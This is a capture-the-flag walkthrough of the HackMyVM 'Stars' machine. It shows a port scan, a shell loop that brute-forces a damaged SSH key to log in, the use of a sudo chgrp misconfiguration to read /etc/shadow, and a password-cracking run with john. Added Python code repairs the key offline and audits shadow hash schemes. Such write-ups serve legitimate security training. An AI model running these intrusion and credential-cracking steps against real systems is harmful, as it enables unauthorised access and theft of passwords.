NOTES ABOUT Stars

[ 2022-11-08 ] [ HackMyVM / Stars ]

Status: Rooted
Skills: Port Scanning, Fuzzing, OpenSSH, Bash Scripting, Password Cracking
Tools: nmap, gobuster, ssh, crunch, john

PORT SCANNING

$ nmap -sCSV -p- 10.0.2.42

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
| 256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_ 256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Cours PHP & MySQL
|_http-server-header: Apache/2.4.51 (Debian)

GETTING IN

$ curl -v 10.0.2.42
[...]
< Set-Cookie: cookie=cG9pc29uZWRnaWZ0LnR4dA%3D%3D
[...]

$ echo cG9pc29uZWRnaWZ0LnR4dA== | base64 -d    # the %3D%3D in the cookie is just URL-encoded base64 padding "=="
poisonedgift.txt

$ curl 10.0.2.42/poisonedgift.txt
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAsruS5/Cd7clZ+SJJj0cvBPtTb9mfFvoO/FDtQ1i8ft3IZC9tHsKP

$ wget 10.0.2.42/poisonedgift.txt

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.42
/sshnote.txt (Status: 200) [Size: 117]

$ curl 10.0.2.42/sshnote.txt
My RSA key is messed up, it looks like 3 capital letters have been replaced by stars.
Can you try to fix it?

sophie

$ touch fixed
$ chmod 600 fixed

for i in $(crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ 2>/dev/null); do
    echo "$i"
    sed "s/\*\*\*/$i/" poisonedgift.txt > fixed   # > truncates the existing file, so the 600 mode set above survives and ssh does not refuse the key
    ssh -i fixed sophie@10.0.2.42 && break         # stop at the first key sshd accepts instead of running through all 26^3
done

AAA
sophie@10.0.2.42: Permission denied (publickey).
AAB
sophie@10.0.2.42: Permission denied (publickey).
[...]
Linux debian 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64
Last login: Sun Oct 17 13:39:16 2021 from 192.168.0.28
sophie@debian:~$ cat user.txt
***************
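
The loop above is a blind online search: every one of the 26^3 = 17,576 candidate keys is handed to sshd, which is slow, loud in auth.log and easy to rate-limit. The file can instead be repaired offline, because a private key that merely decodes is not enough to log in: its numbers also have to agree with each other. The following is an added example, not code from the writeup. It parses the unencrypted openssh-key-v1 format that poisonedgift.txt is in, checks the RSA relations (n = p*q, e*d = 1 mod p-1 and mod q-1, iqmp*q = 1 mod p, and the public blob against the private section), and assigns letters to each "*" until one candidate satisfies all of them; it generalises the page's case in that the stars need not be adjacent. For a self-check it builds its own fixture key from two public constants (the secp256k1 and P-256 group orders, used here purely as convenient large primes; the key, its comment and its checkints are constructed for the demo and are not real key material) and damages three capitals inside d, the one field a parser alone cannot catch.

```python
# Added example, not the writeup's own code: repair a '***'-damaged openssh-key-v1
# RSA key offline by decoding each candidate and checking the RSA relations. Python 3.8+.
import base64, math, re, struct
from itertools import product
from string import ascii_uppercase

MAGIC = b"openssh-key-v1\x00"
HEADER, FOOTER = "-----BEGIN OPENSSH PRIVATE KEY-----", "-----END OPENSSH PRIVATE KEY-----"

def _string(b: bytes) -> bytes:            # SSH wire "string": uint32 length + bytes
    return struct.pack(">I", len(b)) + b

def _mpint(n: int) -> bytes:               # SSH wire "mpint", n >= 0: minimal two's complement
    return _string(n.to_bytes((n.bit_length() + 8) // 8, "big"))

def _expect(cond: bool, what: str) -> None:
    if not cond:
        raise ValueError(what)

class _Reader:                             # sequential cursor over a decoded blob
    def __init__(self, data: bytes, pos: int = 0):
        self.data, self.pos = data, pos
    def take(self, k: int) -> bytes:       # any short read is a ValueError, never an IndexError
        _expect(self.pos + k <= len(self.data), "truncated")
        self.pos += k
        return self.data[self.pos - k:self.pos]
    def u32(self) -> int: return int.from_bytes(self.take(4), "big")
    def string(self) -> bytes: return self.take(self.u32())
    def mpint(self) -> int: return int.from_bytes(self.string(), "big")

def parse_rsa_key(pem: str) -> dict:
    """Decode an unencrypted openssh-key-v1 RSA key; ValueError on anything malformed."""
    body = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
    raw = base64.b64decode(body, validate=True)   # a leftover '*' is not base64 -> error
    _expect(raw.startswith(MAGIC), "bad magic")
    r = _Reader(raw, len(MAGIC))
    _expect(r.string() == b"none" and r.string() == b"none", "encrypted key, out of scope")
    r.string()                                    # kdf options, empty for "none"
    _expect(r.u32() == 1, "expected exactly one key")
    pub = _Reader(r.string())                     # public key blob: type, e, n
    _expect(pub.string() == b"ssh-rsa", "not an RSA key")
    pub_e, pub_n = pub.mpint(), pub.mpint()
    priv = _Reader(r.string())                    # private section
    _expect(priv.u32() == priv.u32(), "checkint mismatch")   # the two checkints must agree
    _expect(priv.string() == b"ssh-rsa", "private key type mismatch")
    n, e, d, iqmp, p, q = (priv.mpint() for _ in range(6))
    comment = priv.string()
    pad = priv.data[priv.pos:]                    # deterministic 1,2,3,... padding to block size
    _expect(pad == bytes(range(1, len(pad) + 1)), "bad padding")
    return dict(n=n, e=e, d=d, iqmp=iqmp, p=p, q=q, pub_n=pub_n, pub_e=pub_e, comment=comment)

def rsa_consistent(k: dict) -> bool:
    """True only if every stored RSA parameter agrees with the others."""
    n, e, d, p, q = k["n"], k["e"], k["d"], k["p"], k["q"]
    return (p * q == n and (n, e) == (k["pub_n"], k["pub_e"]) and k["iqmp"] * q % p == 1
            and e * d % (p - 1) == 1 and e * d % (q - 1) == 1)

def repair_key(damaged: str, wildcard: str = "*", alphabet: str = ascii_uppercase):
    """Assign letters to the wildcards (left to right, so they need not be adjacent);
    return the first candidate that parses AND is arithmetically consistent, else None."""
    for combo in product(alphabet, repeat=damaged.count(wildcard)):
        cand = damaged
        for ch in combo:
            cand = cand.replace(wildcard, ch, 1)
        try:
            if rsa_consistent(parse_rsa_key(cand)):
                return cand
        except ValueError:
            pass
    return None

def build_toy_key(p: int, q: int):
    """Constructed fixture, not a real key: p, q serialised as ssh-keygen would (unencrypted,
    fixed checkints, base64 on one line). Returns (pem text, raw byte offset of d)."""
    n, phi, e = p * q, (p - 1) * (q - 1), 65537
    while math.gcd(e, phi) != 1: e += 2      # keep e invertible modulo phi
    d, iqmp = pow(e, -1, phi), pow(q, -1, p)
    pub = _string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    priv = (struct.pack(">II", 0x5A5A5A5A, 0x5A5A5A5A) + _string(b"ssh-rsa")
            + b"".join(_mpint(x) for x in (n, e, d, iqmp, p, q)) + _string(b"toy@example"))
    priv += bytes(range(1, (-len(priv)) % 8 + 1))   # pad to the 8-byte block
    blob = (MAGIC + _string(b"none") * 2 + _string(b"") + struct.pack(">I", 1)
            + _string(pub) + _string(priv))
    return "\n".join([HEADER, base64.b64encode(blob).decode(), FOOTER, ""]), blob.index(_mpint(d)) + 4

def damage_key(pem: str, d_off: int) -> str:
    """Overwrite the first run of three capitals inside d with '***': unlike the fixed
    structural fields, a wrong d still parses and is rejected only by the RSA check."""
    body = pem.splitlines()[1]
    m = re.compile(r"[A-Z]{3}").search(body, (d_off // 3 + 1) * 4)  # first base64 group inside d
    return pem.replace(body, body[:m.start()] + "***" + body[m.end():])

# Fixture primes: the secp256k1 and P-256 group orders, public constants with random-looking low halves.
TOY_P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
TOY_Q = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

if __name__ == "__main__":                 # self-check on the fixture; for the real file use
    good, d_off = build_toy_key(TOY_P, TOY_Q)   # repair_key(open("poisonedgift.txt").read())
    print("repaired" if repair_key(damage_key(good, d_off)) == good else "failed")
```

Run with no arguments for the self-check. On the challenge file, repair_key(open("poisonedgift.txt").read()) returns the fixed text; write it to a file with mode 600 and use it with ssh -i, which makes one login attempt instead of thousands. The structural checks (magic, "none" cipher, "ssh-rsa" type strings, equal checkints, 1,2,3... padding) reject most wrong guesses on their own; the arithmetic check is what catches a wrong digit inside n, e, d, iqmp, p or q, which parses perfectly well.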

ELEVATING PRIVILEGES

sophie@debian:~$ sudo -l
Matching Defaults entries for sophie on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sophie may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/chgrp

sophie@debian:/etc$ cat passwd
root:x:0:0:root:/root:/bin/bash
sophie:x:1001:1001:,,,:/home/sophie:/bin/bash

/etc/shadow is mode 0640 root:shadow, so handing it sophie's own group (gid 1001 from passwd above) is all it takes to read the hashes:

sophie@debian:/etc$ sudo chgrp 1001 /etc/shadow
sophie@debian:/etc$ cat /etc/shadow
root:$1$root$dZ6JC474uVpAeG8g0oh/7.:18917:0:99999:7:::
sophie:$y$j9T$mD6gcz0.6rC4ZwGpDem3o0$HzDd6YXLy3Dsht17WVVX7v7ReGcJ9PXhG/B3bx4Nz/C:18917:0:99999:7:::

$ unshadow ./passwd ./shadow > pass.txt 

$ cat pass.txt
root:$1$root$dZ6JC474uVpAeG8g0oh/7.:0:0:root:/root:/bin/bash
sophie:$y$j9T$mD6gcz0.6rC4ZwGpDem3o0$HzDd6YXLy3Dsht17WVVX7v7ReGcJ9PXhG/B3bx4Nz/C:1001:1001:,,,:/home/sophie:/bin/bash

$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules ./pass.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********* (root)
1g 0:00:00:04 DONE (2022-11-08 13:40) 0.2314g/s 6600p/s 6600c/s 6600C/s camera1..240787
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
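
Why root fell in four seconds while sophie's line was not even loaded: root's hash is $1$ md5crypt, a fixed 1000 MD5 iterations with no cost parameter, so rockyou goes through it at full wordlist speed; sophie's is $y$ yescrypt, which the md5crypt run above simply skipped ("Loaded 1 password hash"). The following is an added example, not code from the writeup: it classifies each /etc/shadow entry by its crypt(3) prefix and flags the ones that give an attacker no cost factor to fight. The sample input is the two lines from the dump above plus one constructed locked system account.

```python
# Added example, not the writeup's own code: classify each /etc/shadow entry by its
# crypt(3) prefix and flag the ones an attacker can grind through at wordlist speed.
# Prefix -> (scheme, legacy?). Legacy schemes have no cost parameter (md5crypt is a fixed
# 1000 MD5 iterations; descrypt 25 DES rounds over at most 8 characters), so they fall at
# wordlist speed, as root's did above. The others carry a tunable cost per guess.
SCHEMES = {"1": ("md5crypt", True), "2a": ("bcrypt", False), "2b": ("bcrypt", False),
           "2y": ("bcrypt", False), "5": ("sha256crypt", False), "6": ("sha512crypt", False),
           "7": ("scrypt", False), "y": ("yescrypt", False), "gy": ("gost-yescrypt", False)}
COSTED = {"bcrypt", "scrypt", "yescrypt", "gost-yescrypt"}   # cost always sits in the 2nd '$' field

def classify_hash(field: str) -> dict:
    """Classify one shadow password field: scheme, whether it is legacy, and its cost string."""
    if field == "":
        return dict(scheme="empty", legacy=True, cost=None)      # no password at all
    if field[0] in "!*":
        return dict(scheme="locked", legacy=False, cost=None)    # password auth disabled
    parts = field.split("$")                                     # "", id, [cost,] salt, hash
    if len(parts) < 3 or parts[0] != "":
        return dict(scheme="descrypt", legacy=True, cost=None)   # 13-char DES hash, no '$'
    scheme, legacy = SCHEMES.get(parts[1], ("unknown:" + parts[1], False))
    cost = parts[2] if scheme in COSTED or parts[2].startswith("rounds=") else None
    return dict(scheme=scheme, legacy=legacy, cost=cost)

def audit_shadow(shadow_text: str) -> list:
    """Return (user, scheme, finding) for every entry that will not slow an attacker down."""
    findings = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or line.startswith("#"):
            continue
        user, info = fields[0], classify_hash(fields[1])
        if info["scheme"] == "empty":
            findings.append((user, "empty", "empty password field"))
        elif info["legacy"]:
            findings.append((user, info["scheme"], "legacy hash without a cost factor"))
    return findings

# Sample input: the two lines from the /etc/shadow dump above plus one constructed
# locked system account, so the legacy, costed and locked branches are all exercised.
SAMPLE_SHADOW = """\
root:$1$root$dZ6JC474uVpAeG8g0oh/7.:18917:0:99999:7:::
sophie:$y$j9T$mD6gcz0.6rC4ZwGpDem3o0$HzDd6YXLy3Dsht17WVVX7v7ReGcJ9PXhG/B3bx4Nz/C:18917:0:99999:7:::
daemon:*:18917:0:99999:7:::
"""

if __name__ == "__main__":
    for line in SAMPLE_SHADOW.splitlines():
        user, info = line.split(":")[0], classify_hash(line.split(":")[1])
        print(f"{user:8} {info['scheme']:12} cost={info['cost']}")
    for user, scheme, note in audit_shadow(SAMPLE_SHADOW):
        print(f"FINDING {user}: {scheme}: {note}")
```

On the sample the audit reports only root. Pointing it at a real /etc/shadow (or at the unshadow output above) gives a quick triage of which hashes are worth feeding to john first and which ones will only yield to a long, targeted run.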

root@debian:~# cat root.txt 
*****************

root@debian:~# systemctl poweroff
root@debian:~# Connection to 10.0.2.42 closed by remote host.
Connection to 10.0.2.42 closed.
